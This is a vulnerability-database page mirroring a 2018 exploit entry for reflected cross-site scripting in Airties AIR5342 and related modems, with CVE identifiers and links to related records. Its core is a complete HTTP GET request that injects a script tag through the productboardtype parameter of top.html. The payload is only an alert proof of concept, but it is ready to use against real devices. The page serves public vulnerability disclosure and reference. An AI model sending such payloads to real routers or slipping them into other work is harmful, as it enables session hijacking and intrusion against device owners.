Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtİsmail Taşdelen1337DAY-ID-31248
HistoryOct 03, 2018 - 12:00 a.m.

Airties AIR5342 1.0.0.18 - Cross-Site Scripting Vulnerability

2018-10-0300:00:00
İsmail Taşdelen
0day.today
38

0.004 Low

EPSS

Percentile

73.4%

JSON

Exploit for hardware platform in category web applications

# Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: [https://www.airties.com/]
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# Affected products: AIR5342, AIR5343v2, AIR5443v2, AIR5453, AIR5442, AIR5750, AIR5650, AIR5021
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# CVE : CVE-2018-17593, CVE-2018-17590, CVE-2018-17591, CVE-2018-17588, CVE-2018-17587
   
# A cross site scripting vulnerability has been discovered in the AIR5342 modem of the AirTies manufacturer. 
# AirTies Air 5342 devices have XSS via the top.html productboardtype parameter.  
   
# HTTP Requests :
 
GET /top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Ismail%20Tasdelen%22);%3C/script%3E HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

#  0day.today [2018-10-04]  #

Related

exploitpack 1
exploitdb 1
cve 5
cvelist 5
packetstorm 5
nvd 5
prion 5
zdt 5
exploitpack
exploitpack
Airties AIR5342 1.0.0.18 - Cross-Site Scripting
2018-10-03 00:00:00
exploitdb
exploitdb
Airties AIR5342 1.0.0.18 - Cross-Site Scripting
2018-10-03 00:00:00
cve
cve
CVE-2018-17588
2018-10-02 18:29:01
CVE-2018-17587
2018-10-02 18:29:01
CVE-2018-17590
2018-10-02 18:29:01
cvelist
cvelist
CVE-2018-17587
2018-10-02 18:00:00
CVE-2018-17590
2018-10-02 18:00:00
CVE-2018-17593
2018-10-02 18:00:00
packetstorm
packetstorm
Airties AIR5453 1.0.0.18 Cross Site Scripting
2018-09-29 00:00:00
Airties AIR5443v2 1.0.0.18 Cross Site Scripting
2018-09-29 00:00:00
Airties AIR5021 1.0.0.18 Cross Site Scripting
2018-09-29 00:00:00
nvd
nvd
CVE-2018-17593
2018-10-02 18:29:02
CVE-2018-17591
2018-10-02 18:29:01
CVE-2018-17587
2018-10-02 18:29:01
prion
prion
Design/Logic Flaw
2018-10-02 18:29:00
Design/Logic Flaw
2018-10-02 18:29:00
Design/Logic Flaw
2018-10-02 18:29:00
zdt
zdt
Airties AIR5343v2 1.0.0.18 Cross Site Scripting Vulnerability
2018-10-01 00:00:00
Airties AIR5443v2 1.0.0.18 Cross Site Scripting Vulnerability
2018-10-01 00:00:00
Airties AIR5021 1.0.0.18 Cross Site Scripting Vulnerability
2018-10-01 00:00:00

0.004 Low

EPSS

Percentile

73.4%

JSON
Related for 1337DAY-ID-31248
exploitpack1exploitdb1cve5cvelist5packetstorm5nvd5prion5zdt5